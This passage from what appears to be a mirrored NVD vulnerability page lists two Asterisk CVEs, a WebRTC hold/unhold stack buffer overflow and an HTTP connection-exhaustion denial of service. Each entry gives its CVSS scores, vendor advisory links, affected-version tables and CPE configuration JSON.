          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-02-19 20:15

Modified

2024-11-21 05:56

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch.

References

URL	Tags
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-004.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29205	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-004.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29205	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7382B641-0396-456F-BF33-3F6412E35F2D",
              "versionEndExcluding": "16.16.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C5BA8606-ADA9-4841-A7E2-A9165138849A",
              "versionEndExcluding": "17.9.2",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE8661F7-03A5-4850-BEF7-E306AECE3037",
              "versionEndExcluding": "18.2.1",
              "versionStartIncluding": "18.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
              "matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
    },
    {
      "lang": "es",
      "value": "Un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria en el archivo res_rtp_asterisk.c en Sangoma Asterisk versiones anteriores a 16.16.1, versiones 17.x anteriores a 17.9.2 y versiones 18.x anteriores a 18.2.1 y Certified Asterisk versiones anteriores a 16.8-cert6, permite a un cliente WebRTC autenticado causar un bloqueo de Asterisk mediante el env\u00edo de m\u00faltiples peticiones de hold/unhold en una sucesi\u00f3n r\u00e1pida.\u0026#xa0;Esto es causado por una discrepancia en la comparaci\u00f3n de firmas"
    }
  ],
  "id": "CVE-2021-26713",
  "lastModified": "2024-11-21T05:56:43.707",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-02-19T20:15:13.193",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-787"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-06-17 14:55

Modified

2024-11-21 02:09

Severity ?

Summary

Asterisk Open Source 1.8.x before 1.8.28.1, 11.x before 11.10.1, and 12.x before 12.3.1 and Certified Asterisk 1.8.15 before 1.8.15-cert6 and 11.6 before 11.6-cert3 allows remote attackers to cause a denial of service (connection consumption) via a large number of (1) inactive or (2) incomplete HTTP connections.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-007.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html
cve@mitre.org	http://www.securityfocus.com/archive/1/532415/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-007.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/532415/100/0/threaded

Impacted products

Vendor	Product	Version
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.1
digium	asterisk	1.8.12.2
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.2
digium	asterisk	1.8.20.2
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.1
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.1
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.1
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:-:*:*:*:*:*:*",
              "matchCriteriaId": "6BB940E4-E612-4B27-9188-E794665191B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6952FFDE-92D0-4A75-AABB-113E6FAF5A31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5735354A-CF57-4A9A-9607-169CE50E0655",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "38E0B2C4-55EA-4712-8E75-24A5718F9FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "832F5503-6354-4E39-B927-3BA9606A372D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "9E23AF8A-63B2-4597-8E78-A4672B0C44B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "F76EA1D5-F5F3-49CE-9A73-20FA03C31F88",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "984CD6D9-4A54-4065-8401-DC555AB95425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CDE13439-4124-4BDE-A068-460BCF96419B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
